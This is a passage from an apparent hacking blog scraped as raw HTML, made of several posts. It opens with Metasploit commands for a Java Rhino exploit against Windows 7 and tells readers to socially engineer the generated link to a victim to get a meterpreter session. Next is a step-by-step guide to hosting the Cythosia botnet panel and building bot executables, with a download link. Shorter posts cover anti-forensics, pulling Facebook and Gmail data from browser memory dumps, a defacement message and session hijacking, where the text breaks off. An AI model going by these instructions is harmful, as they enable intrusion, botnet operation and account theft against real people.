<span style="font-family: "verdana" , sans-serif;"><br style="background-color: transparent; color: #999999; line-height: 20px;" /></span>
<span style="background-color: transparent; line-height: 20px;"><span style="border: none; color: lime; font-family: "verdana" , sans-serif; list-style: none; margin: 0px; outline: none; padding: 0px; vertical-align: baseline;">#set srvhost 192.168.1.6</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><b style="background-color: transparent; color: #999999; line-height: 20px;"><span style="border: none; color: #660000; list-style: none; margin: 0px; outline: none; padding: 0px; vertical-align: baseline;"><br /></span></b><span style="background-color: transparent; color: #999999; line-height: 20px;">In this case: </span><span style="background-color: transparent; border: none; color: #38761d; line-height: 20px; list-style: none; margin: 0px; outline: none; padding: 0px; vertical-align: baseline;">192.168.1.6 </span><span style="background-color: transparent; color: #999999; line-height: 20px;">is my internal ip, you have to change this value with your own ip. If you don't know how to get your </span><span8691123 style="background-color: transparent; color: #999999; line-height: 20px;">ip address</span8691123><span style="background-color: transparent; color: #999999; line-height: 20px;">, just open a ternimal and type: </span><span style="background-color: transparent; line-height: 20px;"><span style="color: lime;">#ifconfig</span></span><span style="background-color: transparent; color: #999999; line-height: 20px;">.The next command will define the port of the server which is usually port 80.</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><br style="background-color: transparent; color: #999999; line-height: 20px;" /></span>
<span style="background-color: transparent; line-height: 20px;"><span style="border: none; color: lime; font-family: "verdana" , sans-serif; list-style: none; margin: 0px; outline: none; padding: 0px; vertical-align: baseline;">#set srvport 80</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><b style="background-color: transparent; color: #999999; line-height: 20px;"><span style="border: none; color: #660000; list-style: none; margin: 0px; outline: none; padding: 0px; vertical-align: baseline;"><br /></span></b><span style="background-color: transparent; color: #f3f3f3; line-height: 20px;">Next command is for setting up the path of the exploit:</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><br style="background-color: transparent; color: #999999; line-height: 20px;" /></span>
<span style="background-color: transparent; border: none; color: lime; font-family: "verdana" , sans-serif; line-height: 20px; list-style: none; margin: 0px; outline: none; padding: 0px; vertical-align: baseline;">#set uripath java_rhino</span><br />
<span style="color: lime; font-family: "verdana" , sans-serif;"><span style="background-color: transparent; border: none; line-height: 20px; list-style: none; margin: 0px; outline: none; padding: 0px; vertical-align: baseline;"><br /></span><span style="background-color: transparent; line-height: 20px;"></span><span style="background-color: transparent; border: none; line-height: 20px; list-style: none; margin: 0px; outline: none; padding: 0px; vertical-align: baseline;"># set lhost 192.168.1.6</span></span><br />
<span style="color: lime; font-family: "verdana" , sans-serif;"><span style="background-color: transparent; border: none; line-height: 20px; list-style: none; margin: 0px; outline: none; padding: 0px; vertical-align: baseline;"><br /></span><span style="background-color: transparent; line-height: 20px;"></span><span style="background-color: transparent; line-height: 20px;"><span style="border: none; list-style: none; margin: 0px; outline: none; padding: 0px; vertical-align: baseline;">#set lport 443</span></span></span><br />
<span style="font-family: "verdana" , sans-serif;"><b style="background-color: transparent; color: #999999; line-height: 20px;"><span style="border: none; color: #660000; list-style: none; margin: 0px; outline: none; padding: 0px; vertical-align: baseline;"><br /></span></b><span style="background-color: transparent; color: #999999; line-height: 20px;"></span><b style="background-color: transparent; color: #999999; line-height: 20px;"><span style="border: none; color: #660000; list-style: none; margin: 0px; outline: none; padding: 0px; vertical-align: baseline;"><br /></span></b><span style="background-color: transparent; color: #999999; line-height: 20px;"></span></span><br />
<div class="separator" style="background-color: transparent; clear: both; color: #999999; line-height: 20px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhocSfcxsVOds28vUqlFbiNQxXKhIS-qlVcegZtFmyylVnl_vJ0NaOjt491XDmjhUHbeWDlapm-d_uieRbEUbEwN_g6eZTKJmioJhKtiUedJWJ4Vhlb0NeZW9QGF7XSTtF7jJ0TpP1fmIM/s1600/image2.png" imageanchor="1" style="border: none; color: #ca2b2b; list-style: none; margin: 0px 1em; outline: none; padding: 0px; text-decoration: none; vertical-align: baseline;"><span style="font-family: "verdana" , sans-serif;"><img border="0" height="368" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhocSfcxsVOds28vUqlFbiNQxXKhIS-qlVcegZtFmyylVnl_vJ0NaOjt491XDmjhUHbeWDlapm-d_uieRbEUbEwN_g6eZTKJmioJhKtiUedJWJ4Vhlb0NeZW9QGF7XSTtF7jJ0TpP1fmIM/s640/image2.png" style="border: none; list-style: none; margin: 0px; max-width: 600px; outline: none; padding: 0px; vertical-align: baseline;" width="640" /></span></a></div>
<span style="font-family: "verdana" , sans-serif;"><b style="background-color: transparent; color: #999999; line-height: 20px;"><span style="border: none; color: #660000; list-style: none; margin: 0px; outline: none; padding: 0px; vertical-align: baseline;"><br /></span></b><span style="background-color: transparent; color: #f3f3f3; line-height: 20px;">Notice also that the srvhost & the lhost have the same ip address. Finally, type this command and wait for a connection:</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><br style="background-color: transparent; color: #999999; line-height: 20px;" /></span>
<span style="font-family: "verdana" , sans-serif;"><br style="background-color: transparent; color: #999999; line-height: 20px;" /></span>
<span style="background-color: transparent; line-height: 20px;"><span style="border: none; color: lime; font-family: "verdana" , sans-serif; list-style: none; margin: 0px; outline: none; padding: 0px; vertical-align: baseline;">#exploit</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><b style="background-color: transparent; color: #999999; line-height: 20px;"><span style="border: none; color: #660000; list-style: none; margin: 0px; outline: none; padding: 0px; vertical-align: baseline;"><br /></span></b><span style="background-color: transparent; color: #999999; line-height: 20px;"></span>
</span><br />
<div class="separator" style="background-color: transparent; clear: both; color: #999999; line-height: 20px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjO0alfKTYJkcJyoItML0YlPiJR88PrLeEZf_8LtM4FIV1vxuPhRBgu5YHJ3-D81ps7KQlM49BX0pZHwd1U0ofLVxDM55A2DNQ5_r5xcVmI6s5LLOXSG21bQHFok4U8r_0SFYowdOpdXWY/s1600/image3.png" imageanchor="1" style="border: none; color: #ca2b2b; list-style: none; margin: 0px 1em; outline: none; padding: 0px; text-decoration: none; vertical-align: baseline;"><span style="font-family: "verdana" , sans-serif;"><img alt="backtrack, hacking, windows, metasploit, firefox, penetration testing" border="0" height="370" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjO0alfKTYJkcJyoItML0YlPiJR88PrLeEZf_8LtM4FIV1vxuPhRBgu5YHJ3-D81ps7KQlM49BX0pZHwd1U0ofLVxDM55A2DNQ5_r5xcVmI6s5LLOXSG21bQHFok4U8r_0SFYowdOpdXWY/s640/image3.png" style="border: none; list-style: none; margin: 0px; max-width: 600px; outline: none; padding: 0px; vertical-align: baseline;" title="hacking windows 7" width="640" /></span></a></div>
<span style="font-family: "verdana" , sans-serif;"><b style="background-color: transparent; color: #999999; line-height: 20px;"><span style="border: none; color: #660000; list-style: none; margin: 0px; outline: none; padding: 0px; vertical-align: baseline;"><br /></span></b><span style="background-color: transparent; color: #999999; line-height: 20px;"></span><b style="background-color: transparent; color: #999999; line-height: 20px;"><span style="border: none; color: #660000; list-style: none; margin: 0px; outline: none; padding: 0px; vertical-align: baseline;"><br /></span></b><span style="background-color: transparent; color: #999999; line-height: 20px;"></span><b style="background-color: transparent; color: #999999; line-height: 20px;"><span style="border: none; color: #660000; list-style: none; margin: 0px; outline: none; padding: 0px; vertical-align: baseline;"><br /></span></b></span><br />
<span style="font-family: "verdana" , sans-serif;"><b style="background-color: transparent; color: #999999; line-height: 20px;"><span style="border: none; color: #660000; list-style: none; margin: 0px; outline: none; padding: 0px; vertical-align: baseline;"><br /></span></b><span style="background-color: transparent; color: #f3f3f3; line-height: 20px;">A link has been generated :</span><span style="background-color: transparent; color: #999999; line-height: 20px;"> </span><span style="background-color: transparent; border: none; color: #f6b26b; line-height: 20px; list-style: none; margin: 0px; outline: none; padding: 0px; vertical-align: baseline;"><b>Local IP://192.168.1.6:80/java_rhino</b></span><span style="background-color: transparent; color: #999999; line-height: 20px;">, </span><span style="background-color: transparent; color: #f3f3f3; line-height: 20px;">you have to copy the link and send it to your victim. Once you succeed in "social engineering" the link to a victim, the sending stage starts, and you'll have a java meterpreter session.</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><br style="background-color: transparent; color: #999999; line-height: 20px;" /></span>
<span style="font-family: "verdana" , sans-serif;"><br style="background-color: transparent; color: #999999; line-height: 20px;" /></span>
<span style="font-family: "verdana" , sans-serif;"><b style="background-color: transparent; color: #999999; line-height: 20px;"><span style="border: none; color: #660000; list-style: none; margin: 0px; outline: none; padding: 0px; vertical-align: baseline;"><br /></span></b><span style="background-color: transparent; color: #999999; line-height: 20px;"></span>
</span><br />
<div class="separator" style="background-color: transparent; clear: both; color: #999999; line-height: 20px; text-align: center;">
<span style="border: none; color: #ca2b2b; font-family: "verdana" , sans-serif; list-style: none; margin: 0px 1em; outline: none; padding: 0px; text-decoration: none; vertical-align: baseline;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHDoU5__6mvUu3U11ZpMUmxdIT86zqbZe0-BMF4uK3kQnWIE31jCN7LmtOpTrIx6B4aLB36kigLScWOZj4Jdu3Hjzjyqui-4s5cll_Y68MCwzFr4WAempOjksvc5Xg8994YCHF6tfBuac/s1600/image4.png" imageanchor="1" style="border: none; color: #ca2b2b; list-style: none; margin: 0px 1em; outline: none; padding: 0px; text-decoration: none; vertical-align: baseline;"><img alt="backtrack, hacking, windows, metasploit, firefox, penetration testing" border="0" height="372" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHDoU5__6mvUu3U11ZpMUmxdIT86zqbZe0-BMF4uK3kQnWIE31jCN7LmtOpTrIx6B4aLB36kigLScWOZj4Jdu3Hjzjyqui-4s5cll_Y68MCwzFr4WAempOjksvc5Xg8994YCHF6tfBuac/s640/image4.png" style="border: none; list-style: none; margin: 0px; max-width: 600px; outline: none; padding: 0px; vertical-align: baseline;" title="hacking windows 7" width="640" /></a></span></div>
<div class="separator" style="background-color: transparent; clear: both; color: #999999; line-height: 20px; text-align: center;">
<br /></div>
<div class="separator" style="background-color: transparent; clear: both; line-height: 20px; text-align: left;">
<span style="color: #f3f3f3; font-family: "verdana" , sans-serif;">A meterpreter session will be created.<br />That's it Windows 7 is pwned =)</span></div>
<div>
<br /></div>
<b style="background-color: transparent; color: #999999; font-family: Tahoma, Geneva, sans-serif; font-size: 12px; line-height: 20px;"></b></div>
CHChttp://www.blogger.com/profile/05341889266903644178noreply@blogger.com0tag:blogger.com,1999:blog-5858162330672279498.post-36984816809059031952017-10-12T15:35:00.000-04:002017-12-09T12:12:08.625-05:00Setup cythosia Bot<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="color: #8e7cc3; font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: x-large;">Tutorial to install cythosia Bot</span></div>
<div>
<br /></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJgJX_z52EhCFne_xWcYle7ASivE2PWf77PdV33aIbJCKr5kY05EiZFX3K549q_y-LGLxW0Mj_T1ImFIkKSg2wPKTS3TMjoneRM3LcEWCiWbolDBfXCwOM3bQy5fQbsRR4_XCFfuzZA5Q/s1600/botnetimage.png" imageanchor="1" style="color: black; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin-left: 1em; margin-right: 1em; outline: none; text-align: center;"><img border="0" height="261" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJgJX_z52EhCFne_xWcYle7ASivE2PWf77PdV33aIbJCKr5kY05EiZFX3K549q_y-LGLxW0Mj_T1ImFIkKSg2wPKTS3TMjoneRM3LcEWCiWbolDBfXCwOM3bQy5fQbsRR4_XCFfuzZA5Q/s400/botnetimage.png" style="background-color: transparent; border: none; margin: 0px 4px 0px 0px; padding: 0px;" width="400"></a></div>
<h3 class="post-title entry-title" style="background-color: white; font-family: Georgia, 'Times New Roman Times', serif, Arial; font-size: 24px; line-height: 26px; margin: 0px 0px 8px; orphans: 2; padding: 0px; text-align: left; widows: 2;">
</h3>
<b><span style="font-size: x-small;"><span style="font-style: italic;"><br /></span></span></b><span style="font-family: Verdana, sans-serif;"><b><span style="font-style: italic;"><span style="color: orange;">Requirements:</span></span></b><br /><span style="color: #f3f3f3;">- Cythosia bot,</span><br /><span style="color: #f3f3f3;">- A web host on </span><a href="http://www.000webhost.com/" style="color: #f3f3f3; outline: none;" target="_blank">http://www.000webhost.com/</a><span style="color: #f3f3f3;"> or any other web host but this one is for free.</span><br /><b style="color: #f3f3f3;"><span style="font-style: italic;"><br /></span></b></span><br />
<span style="font-family: Verdana, sans-serif;"><b><span style="font-style: italic;"><span style="color: orange;">First Step:</span></span></b><br /><span style="color: #f3f3f3;">Login into your webhost account or register and get into your web host. The website takes you to a page where you have": List of your domains."</span><br /><span style="color: #f3f3f3;">Click on go to cPanel of the domain you've just made.</span><br /><b style="color: #f3f3f3;"><span style="font-style: italic;"><br /></span></b></span><br />
<span style="font-family: Verdana, sans-serif;"><b><span style="font-style: italic;"><span style="color: orange;">Second Step:</span></span></b><br /><span style="color: #f3f3f3;">Scroll down the new page that is open and click on "File Manager" in the " Files" section.</span><br /><span style="color: #f3f3f3;">note: If the site asks for a login, enter the password of your account.</span><br /><span style="color: #f3f3f3;">Having a new page open, Open the document called " public_html",</span><br /><span style="color: #f3f3f3;">There, Click the upload button,</span><br /><span style="color: #f3f3f3;">You'll be redirected to a page where is:</span><br /><span style="color: #f3f3f3;">Files</span><br /><span style="color: #f3f3f3;">Files entered here will be transferred to the FTP server.</span><br /><span style="color: #f3f3f3;">And</span><br /><span style="color: #f3f3f3;">Archives (zip, tar, tgz, gz)</span><br /><span style="color: #f3f3f3;">Archives entered here will be decompressed, and the files inside will be transferred to the FTP server.</span><br /><span style="color: #f3f3f3;">- Under the archives section, click " Choose File". and choose the " webPanel zip archive that just came after you've extracted the download one. After that click the "Check" above the : "Upload to directory" and wait a few seconds.</span><br /><b style="color: #f3f3f3;"><span style="font-style: italic;"><br /></span></b></span><br />
<span style="font-family: Verdana, sans-serif;"><b><span style="font-style: italic;"><span style="color: orange;">Third Step:</span></span></b><br /><span style="color: #f3f3f3;">Return back to the first page of the File manager.</span><br /><span style="color: #f3f3f3;">Now to configure the files you've just uploaded so the bot could work, you have to enter the webpanel folder on your webhost and click on Chmod after selecting all the files in it. You get redirected to : "Chmod directories and files" there change the Chmod value of the files to 777 and click the Check mark button.</span><br /><b style="color: #f3f3f3;"><span style="font-style: italic;"><br /></span></b></span><br />
<span style="font-family: Verdana, sans-serif;"><b><span style="font-style: italic;"><span style="color: orange;">Forth step:</span></span></b><br /><span style="color: #f3f3f3;">Now you can exit the window your are in, and return to the members area: " Cpanel". There scroll down until you see : "» Software / Services", inside that section, click the one named after " MySQL ".</span><br /><span style="color: #f3f3f3;">Create a new database with the username, database name and password you want, but keep them in your mind or save them somewhere.</span><br /><b style="color: #f3f3f3;"><span style="font-style: italic;"><br /></span></b></span><br />
<span style="font-family: Verdana, sans-serif;"><b><span style="font-style: italic;"><span style="color: orange;">Fifth Step:</span></span></b><br /><span style="color: #f3f3f3;">Return back to the CPanel and click the " phpMyAdmin " in the same section as of the MySQL one. Press Enter phpMyAdmin to the database you've just created. A new window will open, in the one that just opened click, Import, the file that we must choose is the one named dump which is located in the Webpanel folder that you've extracted also in the beginning, select it and press " GO ". After doing that, you can now close that window.</span></span><br />
<span style="font-family: Verdana, sans-serif;"><br /><b><span style="font-style: italic;"><span style="color: orange;">Sixth Step:</span></span></b><br /><span style="color: #f3f3f3;">Get Back to the Cpanel and press file manager again, Navigate to:</span><br /><span style="color: #f3f3f3;">/public_html/Botnet/Webpanel/admin/inc</span><br /><span style="color: #f3f3f3;">And Edit the config.php file, Edit it with the details of the Mysql Database, username and password you've just created.</span><br /><span style="color: #f3f3f3;">Finally, save the file and exit the window.</span><br /><b style="color: #f3f3f3;"><i><br /></i></b></span><br />
<span style="font-family: Verdana, sans-serif;"><b><i><span style="color: orange;">Seventh Step:</span></i></b><br /><span style="color: #f3f3f3;">Enter the domain of your webhost, you'll get to put a password, Type in " admin ".</span></span><br />
<span style="font-family: Verdana, sans-serif;"><br /><b><span style="color: orange;">*Creating a bot:</span></b><br /><span style="color: #f3f3f3;">To create your bot just Open " CythBuilder " and change the " Domain " thing to your domain. After that you can change " 1.0.6 [beta] [23-03-2011]" to a name of your choice. And the " Drop Name.exe " to the file name you want to appear.</span></span><br />
<div class="post-body entry-content" style="background-color: transparent; line-height: 20px; orphans: 2; padding-top: 8px; text-align: justify; widows: 2;">
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;">Extract the file you just downloaded to your desktop.</span><br />
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span>
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span>
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span>
<div style="text-align: center;">
<a href="http://adf.ly/PaimV" target="_blank"><img height="200" src="https://static.mobilesecurity.com/424/8b1/671/9b584ac03b3032ea63ce788914c30f1cce34277286e9079d47caa35/Default/hdpi_icon" width="200"></a><br /><span style="color: #93c47d;">Download here</span></div>
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span>
<br /></div>
</div>
CHChttp://www.blogger.com/profile/05341889266903644178noreply@blogger.com2tag:blogger.com,1999:blog-5858162330672279498.post-44556038639367815722017-06-24T08:40:00.000-04:002017-12-09T12:13:47.407-05:00ANTI FORENSICS ~ Tool<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<h3 class="post-title entry-title" style="color: #2c2c2c; font-family: Arial, Helvetica, sans-serif; font-size: 20px; line-height: 20px; margin-bottom: 10px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-transform: uppercase;">
</h3>
<div style="text-align: center;">
<span style="color: #8e7cc3; font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: x-large;">
DIGITAL ANTI FORENSICS</span></div>
<div style="text-align: center;">
<span style="color: #8e7cc3; font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: x-large;"><br /></span></div>
<div style="text-align: center;">
<img src="http://www.unodc.org/images/southeasterneurope//forensic_image.jpg" /></div>
<div style="text-align: center;">
<span style="color: #8e7cc3; font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: x-large;"><br /></span></div>
<div class="post-body entry-content" style="font-weight: normal; margin: 0px; padding: 0px 10px 0px 0px; text-transform: none;">
<div style="color: #343333; font-size: 12px;">
<br /></div>
<div style="color: #343333; font-size: 12px;">
<br /></div>
<div dir="ltr" trbidi="on">
<div style="text-align: left;">
<span style="color: orange; font-family: Verdana, sans-serif; font-size: large;">
Digital Anti Forensics</span></div>
<div style="text-align: left;">
<span style="color: orange; font-family: Verdana, sans-serif; font-size: small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: Verdana, sans-serif;"><span style="color: #6aa84f;">Install truecrypt</span></span></div>
<span style="color: #cccccc; font-family: Verdana, sans-serif;"><br /></span>
<span style="color: #cccccc; font-family: Verdana, sans-serif;">This script is used to install Truecrypt, software that is used to create encrypted files using various encryption ciphers. It contains features such as hidden partitions inside the encyption file, as well as the ability to use files and text passwords as keys to the encryption file.</span><br />
<span style="color: #cccccc; font-family: Verdana, sans-serif;"><br /></span>
<span style="color: #cccccc; font-family: Verdana, sans-serif;">Download <a href="http://www.truecrypt.org/downloads" target="_blank">here</a></span><br />
<h2 style="color: #cc0000;">
<span style="font-family: Verdana, sans-serif; font-size: small;"><br /></span></h2>
<div style="text-align: left;">
<span style="color: orange; font-family: Verdana, sans-serif; font-size: large;">
Digital Forensics</span></div>
<div style="text-align: left;">
<span style="color: #38761d; font-family: Verdana, sans-serif; font-size: small;"><br /></span></div>
<div style="text-align: left;">
<span style="color: #6aa84f; font-family: Verdana, sans-serif; font-size: small;">
hexedit</span></div>
<span style="color: #cccccc; font-family: Verdana, sans-serif;"><br /></span>
<span style="color: #cccccc; font-family: Verdana, sans-serif;">hexedit is a program that gives the user the ability to view a file in hexadecimal and ASCII view. It offers the ability to read a device as a file. It includes build in key shortcuts to make it fast and easy to edit and analyze file, including skipping to specific memory locations, cutting and pasting, changing views, modes, and syntaxes similar to that of emacs.</span><br />
<br />
<span style="color: #cccccc; font-family: Verdana, sans-serif;"><strong>Example usage</strong>: hexedit [filename]</span><br />
<span style="color: #cccccc; font-family: Verdana, sans-serif;"><br /></span>
<span style="color: #cccccc; font-family: Verdana, sans-serif;">Download <a href="http://www.softpedia.com/dyn-postdownload.php?p=126975&t=4&i=1" target="_blank">here</a></span></div>
</div>
</div>
CHChttp://www.blogger.com/profile/05341889266903644178noreply@blogger.com0tag:blogger.com,1999:blog-5858162330672279498.post-53224089701350439092017-05-17T10:47:00.000-04:002017-12-09T12:14:30.973-05:00RAM FORENSICS TOOLS - BACKTRACK<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="text-align: center;">
<span style="color: magenta; font-family: Verdana, sans-serif; font-size: x-large;">
RAM FORENSICS TOOLS IN BACKTRACK</span></div>
<div style="text-align: center;">
<span style="color: magenta; font-family: Verdana, sans-serif; font-size: x-large;"><br /></span></div>
<div style="text-align: center;">
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqzQi6AatDqtbYQOp3wop6J608EFqLpzt9YyRg11TNzDo1ideswhMcwD_JvlZRn5_p2IAgw-CeleGUASzovaj5GM6azCJeQS0doVTX2dh54Uy4SJKPz8UNSWA9XpO3chSeey-UVP-_hWcq/s1600/mem-analysis.jpg" /></div>
<div style="text-align: center;">
<br /></div>
<div class="post-body entry-content" style="line-height: 20px; margin: 0px; padding: 0px 10px 0px 0px;">
<div style="color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px;">
<br /></div>
<div dir="ltr" trbidi="on">
<div style="text-align: left;">
<span style="color: cyan; font-family: Verdana, sans-serif; font-size: large;">
pdfbook.py</span></div>
<span style="color: #cccccc; font-family: Verdana, sans-serif;"><br /></span>
<span style="color: #cccccc; font-family: Verdana, sans-serif;">pdfbook.py is a utility that gathers information relating to Facebook from a process dump. On a Windows system, run “pd -p [pid] > file.dump” where [pid] is the process ID of a browser, then on a Linux system run “strings -el file.dump > fbookstrings”. Finally, we use pdfbook.py on the fbookstrings file resulting from the strings command.</span><br />
<span style="color: #cccccc; font-family: Verdana, sans-serif;"><b>Example Usage:</b>pdfbook.py -f fbookstrings</span><br />
<div style="color: #343333;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="color: #343333;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="color: cyan; font-family: Verdana, sans-serif; font-size: large;">
pdgmail</span></div>
<span style="color: #cccccc; font-family: Verdana, sans-serif;"><br /></span>
<span style="color: #cccccc; font-family: Verdana, sans-serif;">pdgmail.py is a utility similar to pdfbook.py, but instead of gathering Facebook information from process dumps, it gathers Gmail information. On a Windows system, run “pd -p [pid] > file.dump” where [pid] is the process ID of a browser, then on a Linux system run “strings -el file.dump > gmailstrings”. Finally, we use pdgmail.py on the gmailstrings file resulting from the strings command.</span><br />
<span style="color: #cccccc; font-family: Verdana, sans-serif;"><br /></span>
<span style="color: #cccccc; font-family: Verdana, sans-serif;"><b>Example Usage:</b>pdgmail.py -f gmailstrings</span><br />
<div style="color: #343333;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="color: cyan; font-family: Verdana, sans-serif; font-size: large;"><br /></span></div>
<div style="text-align: left;">
<span style="color: cyan; font-family: Verdana, sans-serif; font-size: large;">
PTK</span></div>
<span style="color: #cccccc; font-family: Verdana, sans-serif;"><br /></span>
<span style="color: #cccccc; font-family: Verdana, sans-serif;">PTK is a forensics toolkit, similar to the Sleuthkit toolkit. It contains built in modules in order to analyze nearly any type of media or filetype that may be encountered in a forensics investigation. It is browser based, and first needs to have a MySQL database configured. Leave all fields as default, and use the password “toor” for the root user in MySQL. It should setup successfully, at which point you need to register for the free version. Copy the license file you received into the config directory for PTK located at /var/www/ptk/config.</span><br />
<span style="color: #cccccc; font-family: Verdana, sans-serif;"><br /></span>
<span style="color: #cccccc; font-family: Verdana, sans-serif;">Next, log in as either admin or investigator, and open a new case. Fill out the necessary information, then add an image file to begin. It can even be a RAM dump. From here, the built in tools will help you pull information from the image(s).</span><br />
<div style="color: #343333;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; font-size: large;"><br /></span></div>
<div style="text-align: left;">
<span style="color: cyan; font-family: Verdana, sans-serif; font-size: large;">
Volatility</span></div>
<div style="color: #343333;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<span style="color: #cccccc; font-family: Verdana, sans-serif;">Volatility is a framework writen in Python that specializes in RAM analysis. The Volatility Framework can analyze volatile memory dumps from any system type, and can provide a deep insight into the state of the system while it was running. The Volatility Framework has been tested on Windows, OS X, Linux, and even Cygwin. In the example below, we use Volatility in order to list processes that were running on the system while the RAM image ram.img was taken.</span><br />
<span style="color: #cccccc; font-family: Verdana, sans-serif;"><br /></span>
<span style="color: #cccccc; font-family: Verdana, sans-serif;"><b>Example Usage:</b>volatility plist -f ram.img </span></div>
</div>
</div>
CHChttp://www.blogger.com/profile/05341889266903644178noreply@blogger.com0tag:blogger.com,1999:blog-5858162330672279498.post-20030453085553726592016-08-06T10:21:00.001-04:002016-08-06T10:23:51.988-04:00<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="color: #f6b26b; font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: x-large;"><b>IF U R SEEING THIS </b></span></div>
<div style="text-align: center;">
<span style="color: red; font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: x-large;"><b>==> THEN UR NETWORK IS HACKED <==</b></span></div>
<div style="text-align: center;">
<b style="color: #f6b26b; font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;"><span style="font-size: x-large;">NO PROBLEM </span></b></div>
<div style="text-align: center;">
<span style="color: #f6b26b; font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: x-large;"><b>NOTHING CHANGED</b></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZL3YfCDgoGVsqef0mbHFgsFi2OFHSzT94H2sCNOZYJWlLMmztOf5-jFmDCuDxtcbZXnGCnUORi8zwNrfIyxde2NJ2kWaP3JgyzL48uPv4L2uuhSCpsE2bqDWvw2SHJpRNKdBRxpfpdms/s1600/logo+sized.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="397" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZL3YfCDgoGVsqef0mbHFgsFi2OFHSzT94H2sCNOZYJWlLMmztOf5-jFmDCuDxtcbZXnGCnUORi8zwNrfIyxde2NJ2kWaP3JgyzL48uPv4L2uuhSCpsE2bqDWvw2SHJpRNKdBRxpfpdms/s400/logo+sized.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
<span style="color: #6fa8dc; font-family: "verdana" , sans-serif;">@:DDR:@ <complete id="goog_110262715">@:SHAN@</complete></span></div>
</div>
CHChttp://www.blogger.com/profile/05341889266903644178noreply@blogger.com0tag:blogger.com,1999:blog-5858162330672279498.post-8170967374766777582016-08-06T10:03:00.000-04:002016-08-06T10:03:53.922-04:00<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<h3 class="post-title entry-title" itemprop="name" style="background-color: white; color: #d52a33; font-family: Georgia, Utopia, 'Palatino Linotype', Palatino, serif; font-size: 22px; font-weight: normal; margin: 0px; position: relative;">
Session hijacking methodes</h3>
<div class="post-header" style="background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 1.6; margin: 0px 0px 1em;">
<div class="post-header-line-1">
</div>
</div>
<div class="post-body entry-content" id="post-body-2528899749877470803" itemprop="description articleBody" style="background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px; position: relative; width: 846px;">
<div dir="ltr" trbidi="on">
<br />
<div style="margin: 0px; padding: 0px; text-align: center;">
<span style="text-align: left;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 14px; line-height: 22px;">When a user log in to the <span3052978><a href="http://www.blogger.com/blogger.g?blogID=5858162330672279498" id="Y3052978S3" style="color: #000fff;">account</a></span3052978> it starts a session with that account and this session ends up with log out In a running session, user is give a session id which is unique identifier of the user for that session and is only valid for that session.It is the type of attack in which hacker gain access to the session id to gain unauthorized access to information or services in this maintain on <span3052978><a href="http://www.blogger.com/blogger.g?blogID=5858162330672279498" id="Y3052978S0" style="color: #000fff;">cookies</a></span3052978>.</span></span></span><span style="margin: 0px; padding: 0px;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 14px; line-height: 22px;">Session hijacking is simple <span3052978><a href="http://www.blogger.com/blogger.g?blogID=5858162330672279498" id="Y3052978S4" style="color: #000fff;">method</a></span3052978> to hack someone id hack like as a Facebook, g <span3052978><a href="http://www.blogger.com/blogger.g?blogID=5858162330672279498" id="Y3052978S8" style="color: 